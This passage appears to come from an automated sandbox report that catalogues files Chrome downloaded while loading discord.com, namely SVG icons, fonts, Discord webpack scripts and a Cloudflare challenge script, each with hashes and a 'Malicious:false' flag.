                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):688
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.422809447424027
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                                                                                                                                                                                                                                    MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                                                                                                                                                                                                                                    SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                                                                                                                                                                                                                                    SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                                                                                                                                                                                                                                    SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/9017b7062734e72bb476.svg
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 139388, version 2.459
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):139388
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99804629870967
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:3072:Q69dyqPSD49z56qcFxDiYZHYj3pU5qJvdzqC3dZIwv82phTFsZ:yUSD49d6TDiYZ8pU4Jvlnd42vmZ
                                                                                                                                                                                                                                                                                    MD5:DB985AAA3C64F10506D96D876E350D47
                                                                                                                                                                                                                                                                                    SHA1:AAD4A93575E59643FED7617E2FEB893DD763D801
                                                                                                                                                                                                                                                                                    SHA-256:234FEB9A8A2C759D00A4959506A3B9CB94C772186A2D117AED973347C7EF1891
                                                                                                                                                                                                                                                                                    SHA-512:300D0D35EBB9E27D66489FFB3E5502A4DCD3AF032FB0F672D4F004E3846FB795772B6938C99DAFED6FAD0C25DA8412D6F6A7B0221EB2540E84527703DB5B7073
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/452d7be36bf4b23241bd.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2...... |......9... ...........................f...v....`...........e.6.$..T..X.. ..|...[..[.B...c.{....:.w..T.l...C.T+...G.......F.\s...m..J.n`....y..6.<.................c......#............m..n...u..#$H..+....1).oq.l.@...U...#TpP...C..Xk.`.k.....(!...1k0....2f.W^.&hw.hF&h...v.[dA..Y./.6....zC..3._d.....r@...n.$...,.F.6X......SG....x...N.+..6.a%.].V}.u.(P..w.pK..%?.o......b.So1.....M.5.2........).`.N...D.fwTz..a.A. ...).=.\Y..Z.')+.../....0{..8..26u.;<a.......<...=.....eq;kD....Y..I^..`.R..n...T=.R.*.T.Jl.W..p..]..*...5.(y#....P.G.N........$Iv.....~....ns...J....TuY!o..jz...P5|@..H.Tu.P.b!T..r7..,<.u.O....?......J.9...........r....~..f..U`...Y..|....;..K>cl.....`_.+..l....f>.s.#w...36...[...9rI..t@.....b7.s..F....<..x.zT.t.5...8..?..j9k.'-.)u.[..w..>1I.....2.w.;..3.\?.,...b!.B$Qh.......A....?#...O.....5~W.h..HD.....V..d.O..\x1.rLV..U.4~...k.m.U...{6mg...q.ldfc...d..>[.i............<.".w^....4...XJ.n.xm..D.......M....XE.@.....GL...
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):4246
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.103696787604314
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:K9F4GfkbfNyN48/E8jfsrKk1Z/eO4oSgT3I/VcbQokvBD:KnqbfQ48/BfsrKYZ/eOBe9FJD
                                                                                                                                                                                                                                                                                    MD5:DDA77F765068E4450D3545A40B777663
                                                                                                                                                                                                                                                                                    SHA1:63AE45EF489734D09D3AEA98E016C0DD1BC733F9
                                                                                                                                                                                                                                                                                    SHA-256:A644A9364BE96AD0A72F8E24397322B4D0646563A11E8FF76191A9239A561AC9
                                                                                                                                                                                                                                                                                    SHA-512:D88521109D4AC8EA200F644973A7A554C1A6B8E0AE4658C7F0E3FAFBEE40A1CB8A6A75BECB2A49AE3B8D226BEE36CD8CA63B492FABC2BF034D6A295349567946
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/0e5029fd9cd4812b6712.svg
                                                                                                                                                                                                                                                                                    Preview:<svg width="124" height="24" viewBox="0 0 124 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)" fill="#fff"><path d="M26.242 2.01A25.218 25.218 0 0 0 19.851 0a18.718 18.718 0 0 0-.819 1.701 23.45 23.45 0 0 0-7.083 0A18.2 18.2 0 0 0 11.121 0a25.13 25.13 0 0 0-6.396 2.015C.68 8.132-.417 14.097.132 19.978c2.682 2.005 5.282 3.223 7.838 4.02A19.514 19.514 0 0 0 9.65 21.23a16.507 16.507 0 0 1-2.644-1.287c.222-.165.439-.337.648-.513 5.098 2.386 10.636 2.386 15.673 0 .211.177.428.348.648.513-.839.505-1.726.939-2.649 1.29A19.432 19.432 0 0 0 23.004 24c2.558-.797 5.16-2.015 7.843-4.022.643-6.817-1.099-12.728-4.605-17.968ZM10.343 16.361c-1.53 0-2.785-1.43-2.785-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174.003 1.74-1.228 3.17-2.785 3.17Zm10.293 0c-1.53 0-2.786-1.43-2.786-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174 0 1.74-1.228 3.17-2.785 3.17ZM41.629 6.122h6.652c1.603 0 2.958.257 4.069.767 1.109.51 1.94 1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65452), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1116184
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.178482469121555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:RQpC3YOy5K/YwhjjmysnhoxtDF+0CehY9yCt3gzzR/zU7gy/msacu9GLLSwiXNF8:2ZUCNKzR5Jti2CHV69rYuO1zJ72vjtY
                                                                                                                                                                                                                                                                                    MD5:6711DB79358E775C42B3D16399971300
                                                                                                                                                                                                                                                                                    SHA1:74AAC9F1BE2C10C3C2E0AB2B790D66D0DC4A9592
                                                                                                                                                                                                                                                                                    SHA-256:A24B1CDBA5CC136E189EF80D928914526C9E76DA614F11020398E2619A17620A
                                                                                                                                                                                                                                                                                    SHA-512:A2FCA03E4E1B0576CAE741C380AC2E4EFAA7AD6B5345E608DA444AF2845911A6F6DB9F4E2AA3212552EB18F9D6CD50F9A5DDCE48BA7A1A32E40BB3BC632D3D41
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22721"],{756809:function(e,o,t){t.r(o),o.default=JSON.parse('{"7sFNfX":"Remove member","Q+uD09":"This person\'s highest role is the same as yours, so you cannot manage them.","0F/Zzc":"This server requires members with moderation powers to have Multi-Factor Authentication. You cannot take any moderation actions until you enable it.","9fmXWF":"You have a verified email.","8P7MX1":"Sorry :(","SxsBFB":"Can you tell us more?","If4iTU":[[6,"subscriberCount",{"=1":[[7]," Boost"],"other":[[7]," Boosts"]},0,"cardinal"]],"0h7bx8":"Enable Hardware Scaling","PeXhgI":"Save Image","IwHU3d":"User Reported","kcHxi4":"Operating System","CUBxDA":"It may take a few minutes for the DNS record to propagate.","9iFR6+":"Contact","gIVkjo":"Manage Boosts","jHfRvb":["You must verify the following account to get the role ",[8,"$b",[[1,"roleName"]]]],"HhUh7O":"Dark Green","TQY/RU":"Membership Rejected","7Tllub":"Now you can use
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.921485085907038
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                                                                                                                                                                                                                                    MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                                                                                                                                                                                                                                    SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                                                                                                                                                                                                                                    SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                                                                                                                                                                                                                                    SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):139
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.710597482771287
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                                                                                                                                                                                                                                    MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                                                                                                                                                                                                                                    SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                                                                                                                                                                                                                                    SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                                                                                                                                                                                                                                    SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17414)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17463
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.594709634970644
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:5wLnWOUnUuyMNps0HHHsglNzUxBAAdTRIZWiv/XB2P2BY9:yLQne0P5UxMXB2PB9
                                                                                                                                                                                                                                                                                    MD5:91BAF608F20FFC81EF2AF8C0E617267B
                                                                                                                                                                                                                                                                                    SHA1:4FB6FC20D20F3FD37F4C76AC2E3CD26DD92CB9A7
                                                                                                                                                                                                                                                                                    SHA-256:D994CE324ABC3F61CD3996C94774551CE9606BC258DA7E0AFCC5BEFB3614BDA9
                                                                                                                                                                                                                                                                                    SHA-512:17DF587F5D6969C33A550F3FCF69ED44B01D12F0EA77E25B81D441D8E254C3DAEC0093A5F31A6579F3545B9953F2C882D421AB465BC4FF5FD1DD31302231B15E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26172"],{884835:function(t,e,r){"use strict";var o=r(311596);function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOfType:e,shape:e,exact:e,checkPropTypes:i,resetWarningCache:n};return r.PropTypes=r,r}},639519:function(t,e,r){t.exports=r(884835)()},311596:function(t){"use strict";t.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},58615:function(t,e,r){var o=r(338091);function n(t){this.mode=o.MODE_8BIT_BYTE,this.data=t}n.prototype={getLength:fu
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 39764, version 2.66
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):39764
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.993646621116526
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:90TMDBOLlFMKbQDweRs+mkq4oY+VT6p+0t5LMXTkfm7s/U2Uq:6TppGKMDwtN4orTAHjMDja
                                                                                                                                                                                                                                                                                    MD5:71D3E9DC2BCB8E91225BA9FAB588C8F2
                                                                                                                                                                                                                                                                                    SHA1:D7E38EE4C245F64B78EB18E6ECD7B9F53B3254A8
                                                                                                                                                                                                                                                                                    SHA-256:AE99AAEDE2F373187A4FE442A2CB0AB9C2945EFBAB01CF33E01BE517C0C4F813
                                                                                                                                                                                                                                                                                    SHA-512:DEDA05EBD575D413AA2277876991ECC2EA238907390753485BA1B487EDE2F432363C46DAAD5F3F240EAAF8D3258150829A3AE3D2D9C420EA59567CFD440361A6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/1222195a37d6dd10994e.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2.......T......}........B..........................z.. .`..P..D..W........S.6.$..`..r.. .....F..=[.W..ir.h......,......j..In.X....Uj..3...`K\t........".%.]..p..E........G..9&r...S.+.r.5....~`.....S'..1~.a..H...S.........N.tX2G7.u..m.z.!.......).w....V....:.6..W.\.+..j.K...[|.n..dg.....Kx:;....7?2.j..\...0..=zd.(...{.c.....}._..Q.....dUx....b.\Y,.........W.b.zkAX.,..X..jO..*w..% .[..DD.X..G\..?.9..\.G...#...T ..".$.Z.P...W..*5.b.._......}at.....@2.A.....m...5Oy....e.a...D...'.s.$...Q.......[.....A.....r..&....8.Q.KZ.#G...#_.~...yh1$.b~.0S[..6..+...../...jdlcC_0S..J.J!e.'...)3.O..}.C.)...v.qn.......5}.7{.m.b.&:.S..h>.hz..."N.G8..A..&.....s...3<...C... _.F$.`.J.....UuKv.ik.H.'....e..b-k..kt..!....Q.l.R)ai&....Dp..\T).O...'6.<....u..Wi*M.s....I@.....+.....=...&.6.N..n.....\..k...8.....P6.f..k{...3....5....C..T.iG.5....s...$W*..=^.*..3..V.._\..J..2`.........z........1....l.F... .zVb...0.Z..=........[2?.V.....J.....!4B.U..**.....>.Ta`0...
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):5601
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7655360019382895
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:2XobeWK+r3kiJfaaLUmbybQSfuaVRbm0HMgFfgWuAyEdVAmefr4/8VZPUGky:qobvfaa9DSfXDbXMaYPAyEdLefr4/YMe
                                                                                                                                                                                                                                                                                    MD5:13FF42A071C43FA5521C11EB2F2EA914
                                                                                                                                                                                                                                                                                    SHA1:B97D6318B384D57DEFD41EC4DEBF9D7DE198537C
                                                                                                                                                                                                                                                                                    SHA-256:6B8776086567649C2432023184979BB8244A268C081FC1D478D834BF50A169F9
                                                                                                                                                                                                                                                                                    SHA-512:F38C1D3760B23A65EACDB8214424227BDFE638C4A86E6DB89D8D86E29A820060165583FB7794E77935E52B62A6FE09567FC71FB44986D0FBD473F54DEBC56202
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/05bd1eb5dea5ee3387f4.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}let s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null};class d extends(i=a.ZP.PersistedStore){initialize(e){null!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusMedia(){return s.wowMomentWumpusMediaUrl}}o(d,"displayName","PurchasedItemsFestivityStore"),o(d,"persistKey","PurchasedItemsFestivityStore"),o(d,"migrations",[e=>({...e})]),t.Z=new d(c.Z,{LOGOUT:function(){s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null}},PURCHASED_ITEMS_FESTIVITY_SET_CAN_PLAY_WOW_MOMENT:functi
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8076), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8076
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.760026397226924
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:hLfxwXDvpDaNk66T3FZnx2onRyW3fycNbr5MhTm4anKbMZldUM:NYvpX66T3Fhx2azhjMtr6Z7N
                                                                                                                                                                                                                                                                                    MD5:36113AC5F6C67C45E4F0522045A8326D
                                                                                                                                                                                                                                                                                    SHA1:76B0BC3D2663AA75578A1C618CAFADEAF1B4A9DF
                                                                                                                                                                                                                                                                                    SHA-256:AB6C52E825DCB62018AE792579870971BA958CCF311690F8CE816D81FF4B32E4
                                                                                                                                                                                                                                                                                    SHA-512:D8D7443372A5E347111EEF210491492F168C31C6507C44B7DFF289F3EC41FC7290081350D9ECB8EF86F6607E0048095E27C3414E6AD836C62ED62B410AE80651
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,y,z,B){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(290))/1+-parseInt(U(246))/2+-parseInt(U(241))/3+-parseInt(U(337))/4*(-parseInt(U(259))/5)+parseInt(U(283))/6*(parseInt(U(293))/7)+-parseInt(U(266))/8+-parseInt(U(315))/9*(-parseInt(U(319))/10),f===d)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,717661),h=this||self,i=h[V(278)],n={},n[V(258)]='o',n[V(316)]='s',n[V(299)]='u',n[V(252)]='z',n[V(301)]='n',n[V(281)]='I',n[V(304)]='b',o=n,h[V(294)]=function(D,E,F,G,a4,I,J,K,L,M,N){if(a4=V,E===null||void 0===E)return G;for(I=x(E),D[a4(331)][a4(277)]&&(I=I[a4(300)](D[a4(331)][a4(277)](E))),I=D[a4(260)][a4(265)]&&D[a4(234)]?D[a4(260)][a4(265)](new D[(a4(234))](I)):function(O,a5,P){for(a5=a4,O[a5(335)](),P=0;P<O[a5(261)];O[P]===O[P+1]?O[a5(288)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a4(268)][a4(296)](J),K=0;K<I[a4(261)];L=I[K],M=v(D,E,L),J(M)?(N='s'===M&&!D[a4(286)](E[L]),a4(239)===F+L?H(F+L,M):N|
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10980)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):11029
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.414014518072761
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:YiNLbBPG+pZWO8s4bWVJtne8/9wPlgaBIhfS1TqVaPuRic0pPdJITbtrgY6ZnQpV:Yau+pgOB4bWV7eY9wPl2HB0ifaTYcqYy
                                                                                                                                                                                                                                                                                    MD5:0D550EA88632FD7BBE604D65E78B2E79
                                                                                                                                                                                                                                                                                    SHA1:6FF27D7436164B6BDF5CFCBC27F9787C39A07E8F
                                                                                                                                                                                                                                                                                    SHA-256:07EFFC13ED9C6748926991DDBBB1F24FB0C5131CF2B1E5ABCA3ECC5EAD5F39A0
                                                                                                                                                                                                                                                                                    SHA-512:D84D6A285699666D4923C34EEBBA8879C15E94DA871CB323B0A4AB8F57CCC0042FE06E6E9412066DE910C3AA73490D20AF29DE1758CC56B363559BE0963AC34C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ed216fb74081c12ffece.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["52030"],{48550:function(e,t,n){n.d(t,{P:function(){return i}});var l=n(388032);let i={get webauthn(){return l.intl.string(l.t.gTH4Dg)},get totp(){return l.intl.string(l.t.nXKmyc)},get sms(){return l.intl.string(l.t.ZbVwZW)},get password(){return l.intl.string(l.t["8F6hKS"])},get backup(){return l.intl.string(l.t.vhSRKS)}}},124860:function(e,t,n){n.d(t,{Cd:function(){return f},YR:function(){return g}}),n(47120),n(411104);var l=n(200651),i=n(192379),r=n(481060),s=n(447097),o=n(873124),a=n(248902),d=n(160511),u=n(51693),c=n(973810),h=n(388032);function f(e){var t,n;let{mfaChallenge:h,mfaFinish:f,onEarlyClose:m,onClose:g,width:S=440}=e,[x,v]=i.useState(null!==(n=null===(t=h.methods[0])||void 0===t?void 0:t.type)&&void 0!==n?n:"select"),[p,j]=i.useState(x),C=async e=>{let{mfaType:t,data:n}=e;await f({mfaType:t,data:n,ticket:h.ticket}),null!=g&&g()},b={mfaChallenge:h,finish:C,setSlide:v,onClose:m};return(0,l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):137
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.832107377824175
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                                                                                                                                                                                                                                    MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                                                                                                                                                                                                                                    SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                                                                                                                                                                                                                                    SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                                                                                                                                                                                                                                    SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17640)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):17689
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.434053150388305
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:V5Vr/jve2WzOjBYUqxqYJVqA9sUqY1Un0VGiZhWuJj4SNZ:vVLxjE0VqR
                                                                                                                                                                                                                                                                                    MD5:14E84006F1AA9308539C8042DE09B598
                                                                                                                                                                                                                                                                                    SHA1:AE9D5A748D6C89CA35C9070D7D28A57E21911C35
                                                                                                                                                                                                                                                                                    SHA-256:EB0A78267C1E3AD8D0AE58A3BF20BAE35F911AD5000B5F103313E9F2F86D3112
                                                                                                                                                                                                                                                                                    SHA-512:89773668D42BE6F04627E8FA3B596FBAC10DBD71F048CAEC9F8EFD4E693A46A1EF29137A122B764691E32AB6EC4638EC0879DD971FB0DAA9FFD365BD27FF2DDA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/822c37e354b4a39dd6ca.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,n){n(757143);var s,r=n(200651),i=n(192379),o=n(120356),l=n.n(o),a=n(593473),c=n(873546),u=n(442837),d=n(570140),h=n(893776),p=n(129293),m=n(388905),f=n(17894),g=n(124860),x=n(108427),C=n(314897),v=n(585483),N=n(981631),j=n(388032),y=n(113207);function E(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}u.ZP.initialize();class k extends(s=i.PureComponent){componentDidMount(){(0,x.e)("reset_password")}renderPasswordReset(){let{password:e,error:t,hasCancel:s}=this.state,i=this.isSubmitting(),o=null!=t?t:this.renderError("password");return(0,r.jsxs)(m.ZP,{onSubmit:this.handleSubmit,tag:"form",children:[(0,r.jsx)("img",{alt:"",src:null==o?n(26230):n(935227),className:y.marginBottom20}),(0,r.jsx
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):13439139
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.808610998286648
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:98304:1AvCPlsOiaglsm9+vhvK+gzbTdPME8ONXOOTnSPefvVAsHZ7e+dwbJ389b/:1flXgAhvK+gzbTdPMENOQF5do389b/
                                                                                                                                                                                                                                                                                    MD5:A4DA9A05EDCC0A143CFB01E6A2EA6C82
                                                                                                                                                                                                                                                                                    SHA1:4539C55BEB16EF266B8CD96CEB182B3586F4F3E3
                                                                                                                                                                                                                                                                                    SHA-256:8CA3F5FE1A933E1A5218FD072DD09C39BDEDA270EE93833178CD91D12DD50A9C
